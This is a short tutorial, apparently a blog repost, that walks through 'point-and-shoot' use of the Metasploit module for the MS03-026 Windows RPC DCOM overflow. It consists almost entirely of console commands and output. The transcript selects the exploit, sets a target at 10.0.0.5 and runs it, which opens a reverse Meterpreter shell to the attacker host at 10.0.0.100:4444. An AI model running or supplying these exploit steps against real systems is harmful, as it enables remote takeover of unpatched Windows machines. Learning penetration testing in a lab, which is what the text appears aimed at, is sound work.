  • Learning Metasploit: ms03_026

    Point-and-shoot use of ms03_026_dcom:

    Matching Modules
    ================
    
    Name                                       Disclosure Date  Rank    Description
    ----                                       ---------------  ----    -----------
    auxiliary/scanner/telnet/telnet_ruggedcom                   normal  RuggedCom Telnet Password Generator
    exploit/windows/dcerpc/ms03_026_dcom       2003-07-16       great   MS03-026 Microsoft RPC DCOM Interface Overflow
    exploit/windows/smb/ms04_031_netdde        2004-10-12       good    MS04-031 Microsoft NetDDE Service Overflow
    exploit/windows/smb/psexec_psh             1999-01-01       manual  Microsoft Windows Authenticated Powershell Command Execution
    
    
    msf > use exploit/windows/dcerpc/ms03_026_dcom // select the exploit module
    msf exploit(ms03_026_dcom) > show options
    
    Module options (exploit/windows/dcerpc/ms03_026_dcom):
    
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    RHOST                   yes       The target address
    RPORT  135              yes       The target port
    
    
    Exploit target:
    
    Id  Name
    --  ----
    0   Windows NT SP3-6a/2000/XP/2003 Universal
    
    
    msf exploit(ms03_026_dcom) > set RHOST 10.0.0.5
    RHOST => 10.0.0.5
    msf exploit(ms03_026_dcom) > exploit
    
    [*] Started reverse handler on 10.0.0.100:4444 
    [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
    [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.0.0.5[135] ...
    [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.0.0.5[135] ...
    [*] Sending exploit ...
    [*] Sending stage (770048 bytes) to 10.0.0.5
    [*] Meterpreter session 1 opened (10.0.0.100:4444 -> 10.0.0.5:1231) at 2015-04-25 17:08:20 +0800
    
    meterpreter >       // success!
  • Original source: https://www.cnblogs.com/iDerr/p/4456222.html